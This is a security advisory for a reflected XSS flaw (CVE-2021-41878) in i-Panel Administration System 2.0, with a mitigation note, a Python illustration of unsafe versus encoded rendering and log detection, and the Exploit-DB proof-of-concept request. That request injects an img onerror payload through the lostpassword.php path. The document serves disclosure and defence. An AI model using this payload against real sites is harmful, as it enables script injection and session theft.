Vendor: Administration System
By: Forster Chiu
CVSS: 6.1 (MEDIUM)
CWE: 79 (Reflected Cross-site Scripting (XSS))
Product Name: Administration System
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CVE: CVE-2021-41878
CPE: 2.0:i-panel:administration_system:2.0
Metasploit:
Other Scripts:
Tags: cve,cve2021,ipanel,xss,packetstorm
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'hkurl', 'product': 'i-panel_administration_system'}
Platforms Tested: Chrome, Edge and Firefox
Year: 2021

i-Panel Administration System 2.0 – Reflected Cross-site Scripting (XSS)

An alert box can be generated with the payload shown in the Exploit PoC of the Exploit-DB raw data below.

Mitigation:

Ensure that user-supplied input, here the request path that lostpassword.php reflects back into the page, is validated and output-encoded for the HTML context in which it is rendered before it reaches the response.
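The following Python illustration is added here and is not part of the advisory or of i-Panel's code. It models the reflection pattern the PoC payload implies (the request path echoed into an HTML attribute), shows why the advisory's payload breaks out of that attribute, shows the attribute-encoded output the mitigation calls for, and flags the PoC request in constructed access-log lines. The render functions and the log format are assumptions, not i-Panel's actual code.

```python
from html import escape
from urllib.parse import unquote

# Request path from the advisory's PoC, URL-encoded exactly as sent on the wire.
POC_PATH = "/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E"

# Constructed access-log lines (Common Log Format); 203.0.113.5 is a documentation address.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Oct/2021:10:00:00 +0000] "GET /lostpassword.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Oct/2021:10:00:01 +0000] "GET ' + POC_PATH + ' HTTP/1.1" 200 640',
]


def decode_path(path: str) -> str:
    """Return the path as the server sees it after percent-decoding."""
    return unquote(path)


def render_form_unsafe(request_path: str) -> str:
    """Hypothetical vulnerable pattern (assumed, not i-Panel's code): the request
    path is written into a form action attribute without any encoding, so the
    payload's leading " and > close the attribute and tag and inject <img ...>."""
    return f'<form method="post" action="{request_path}"><input name="email"></form>'


def render_form_safe(request_path: str) -> str:
    """Hardened pattern: HTML-attribute-encode the reflected value. escape() with
    quote=True turns " into &quot; and < > into &lt; &gt;, so the whole payload
    stays inside the attribute as inert text."""
    return f'<form method="post" action="{escape(request_path, quote=True)}"><input name="email"></form>'


def contains_injected_tag(html: str) -> bool:
    """Check whether a literal <img element made it into the rendered markup."""
    return "<img" in html


def flag_reflected_markup(log_line: str) -> bool:
    """Detection helper for access logs: flag a request whose decoded path
    carries markup characters, which is how this PoC appears in a log."""
    try:
        path = log_line.split('"')[1].split()[1]  # "GET /path HTTP/1.1" -> /path
    except IndexError:
        return False
    return any(ch in unquote(path) for ch in '<>"')
```

A fixed action value (or one built from a server-side constant) removes the reflection entirely, which is preferable to encoding alone.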

Exploit-DB raw data:

# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
# Date: 04.10.2021
# Exploit Author: Forster Chiu
# Vendor Homepage: https://www.hkurl.com
# Version: 2.0
# Tested on: Chrome, Edge and Firefox
# CVE: CVE-2021-41878
# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html

As a proof of concept, an alert box can be generated with the following payload.
Exploit PoC:

GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
Host: Forster
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Connection: close